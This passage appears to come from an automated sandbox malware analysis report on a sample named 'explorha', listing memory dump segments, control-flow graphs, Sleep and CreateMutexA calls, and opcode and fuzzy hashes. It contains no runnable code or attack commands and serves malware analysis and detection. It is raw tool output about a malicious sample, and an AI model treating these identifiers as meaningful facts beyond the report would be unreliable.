                                                                                                      • Associated: 00000001.00000002.1884984098.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885037411.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885058736.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885085749.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885105956.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885128001.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885150152.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885197334.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885239465.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885280587.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885308584.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885349685.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885393712.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885436688.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885511659.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885646914.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885810855.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885865893.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886054089.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886116787.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886155065.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886196136.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886231707.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886268739.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886307677.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886353370.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886389613.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886389613.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886472172.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886511462.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886550159.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886593194.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886633721.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886673582.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886711070.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886751171.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886795331.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: 1e9b2aa9e9851ba7d70d70ed285d16bfec8d40576af65c6c3dd6b44285cd067d
                                                                                                      • Instruction ID: 79283dbac25f0ceebbf3495df5dbb0c933d6e6e6e56c23280f093ca33dca92f5
                                                                                                      • Opcode Fuzzy Hash: 1e9b2aa9e9851ba7d70d70ed285d16bfec8d40576af65c6c3dd6b44285cd067d
                                                                                                      • Instruction Fuzzy Hash: F03166716141048BEB08DBBCDD88BACB7A6FB85324F248208E454EB3C5D77699808B51
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00869B49 Relevance: 3.1, APIs: 2, Instructions: 127sleepsynchronizationCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 62 869b49-869b69 66 869b97-869bb3 62->66 67 869b6b-869b77 62->67 70 869bb5-869bc1 66->70 71 869be1-869c00 66->71 68 869b8d-869b94 call 87ecf8 67->68 69 869b79-869b87 67->69 68->66 69->68 76 86a400 69->76 72 869bd7-869bde call 87ecf8 70->72 73 869bc3-869bd1 70->73 74 869c02-869c0e 71->74 75 869c2e-86a3e6 call 879750 71->75 72->71 73->72 73->76 79 869c24-869c2b call 87ecf8 74->79 80 869c10-869c1e 74->80 82 86a423-86a466 Sleep CreateMutexA 76->82 83 86a400 call 8982fa 76->83 79->75 80->76 80->79 83->82
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1884728884.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.1884687592.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884728884.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884794570.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884815207.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884839567.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884932872.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884958352.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884984098.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884984098.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885037411.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885058736.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885085749.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885105956.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885128001.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885150152.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885197334.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885239465.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885280587.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885308584.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885349685.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885393712.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885436688.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885511659.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885646914.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885810855.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885865893.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886054089.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886116787.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886155065.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886196136.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886231707.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886268739.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886307677.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886353370.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886389613.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886389613.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886472172.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886511462.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886550159.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886593194.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886633721.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886673582.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886711070.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886751171.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886795331.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: 2258da0fe5b5f08cb9223663b5aceee99ca1b6444423057325eb8f3c950a8e7e
                                                                                                      • Instruction ID: eb2faa7f4f0b2c78f6f48b2d0bb371240fd2464c53f92eda62d9df8b8c44c9e4
                                                                                                      • Opcode Fuzzy Hash: 2258da0fe5b5f08cb9223663b5aceee99ca1b6444423057325eb8f3c950a8e7e
                                                                                                      • Instruction Fuzzy Hash: 563148716002089BEB0CDB7CDDC9BACB766FBC5324F248218E464EB3D5C775A9808B55
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00869C7E Relevance: 3.1, APIs: 2, Instructions: 126sleepsynchronizationCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 93 869c7e-869c9e 97 869ca0-869cac 93->97 98 869ccc-869ce8 93->98 99 869cc2-869cc9 call 87ecf8 97->99 100 869cae-869cbc 97->100 101 869d16-869d35 98->101 102 869cea-869cf6 98->102 99->98 100->99 103 86a405 100->103 107 869d37-869d43 101->107 108 869d63-86a3e6 call 879750 101->108 105 869d0c-869d13 call 87ecf8 102->105 106 869cf8-869d06 102->106 110 86a423-86a466 Sleep CreateMutexA 103->110 111 86a405 call 8982fa 103->111 105->101 106->103 106->105 114 869d45-869d53 107->114 115 869d59-869d60 call 87ecf8 107->115 111->110 114->103 114->115 115->108
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1884728884.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.1884687592.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884728884.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884794570.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884815207.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884839567.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884932872.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884958352.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884984098.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884984098.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885037411.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885058736.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885085749.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885105956.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885128001.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885150152.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885197334.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885239465.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885280587.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885308584.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885349685.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885393712.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885436688.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885511659.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885646914.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885810855.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885865893.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886054089.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886116787.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886155065.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886196136.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886231707.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886268739.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886307677.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886353370.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886389613.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886389613.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886472172.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886511462.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886550159.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886593194.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886633721.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886673582.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886711070.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886751171.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886795331.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: 04a89d31599896e9ed1fdd58d160185f9625e8dd4326f085a2a97bb630994080
                                                                                                      • Instruction ID: 90b5e8201e9c464fdf50484fc7c98bcd93b1d9d60c09b3ceea3c554728c83481
                                                                                                      • Opcode Fuzzy Hash: 04a89d31599896e9ed1fdd58d160185f9625e8dd4326f085a2a97bb630994080
                                                                                                      • Instruction Fuzzy Hash: 873144726002048BEF08DB78DD88BACBB66FB85324F208618E464EB3D5D77599808B52
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00869EE8 Relevance: 3.1, APIs: 2, Instructions: 124sleepsynchronizationCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 124 869ee8-869f08 128 869f36-869f52 124->128 129 869f0a-869f16 124->129 132 869f54-869f60 128->132 133 869f80-869f9f 128->133 130 869f2c-869f33 call 87ecf8 129->130 131 869f18-869f26 129->131 130->128 131->130 134 86a40f 131->134 136 869f76-869f7d call 87ecf8 132->136 137 869f62-869f70 132->137 138 869fa1-869fad 133->138 139 869fcd-86a3e6 call 879750 133->139 141 86a414-86a466 call 8982fa * 3 Sleep CreateMutexA 134->141 142 86a40f call 8982fa 134->142 136->133 137->134 137->136 145 869fc3-869fca call 87ecf8 138->145 146 869faf-869fbd 138->146 142->141 145->139 146->134 146->145
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1884728884.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.1884687592.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884728884.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884794570.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884815207.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884839567.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884932872.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884958352.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884984098.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884984098.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885037411.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885058736.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885085749.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885105956.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885128001.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885150152.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885197334.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885239465.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885280587.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885308584.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885349685.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885393712.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885436688.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885511659.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885646914.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885810855.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885865893.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886054089.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886116787.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886155065.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886196136.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886231707.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886268739.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886307677.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886353370.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886389613.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886389613.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886472172.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886511462.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886550159.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886593194.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886633721.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886673582.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886711070.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886751171.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886795331.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: e04d90d3d0f20fc54edbe8aaf6402687b04439eef5fc979e624227a4603c8ac9
                                                                                                      • Instruction ID: 552baa533084d60db44aea98c71db90812fe84f85645fcbc93e8f6d63b4f1b05
                                                                                                      • Opcode Fuzzy Hash: e04d90d3d0f20fc54edbe8aaf6402687b04439eef5fc979e624227a4603c8ac9
                                                                                                      • Instruction Fuzzy Hash: 2B3157716002048BEF08EB7CCD89B9DB676FF86314F248218F055EB3D9DB7599808B56
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0086A01D Relevance: 3.1, APIs: 2, Instructions: 123sleepsynchronizationCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 161 86a01d-86a03d 165 86a03f-86a04b 161->165 166 86a06b-86a087 161->166 167 86a061-86a068 call 87ecf8 165->167 168 86a04d-86a05b 165->168 169 86a0b5-86a0d4 166->169 170 86a089-86a095 166->170 167->166 168->167 173 86a414-86a466 call 8982fa * 3 Sleep CreateMutexA 168->173 171 86a0d6-86a0e2 169->171 172 86a102-86a3e6 call 879750 169->172 175 86a097-86a0a5 170->175 176 86a0ab-86a0b2 call 87ecf8 170->176 177 86a0e4-86a0f2 171->177 178 86a0f8-86a0ff call 87ecf8 171->178 175->173 175->176 176->169 177->173 177->178 178->172
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1884728884.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.1884687592.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884728884.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884794570.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884815207.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884839567.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884932872.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884958352.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884984098.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884984098.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
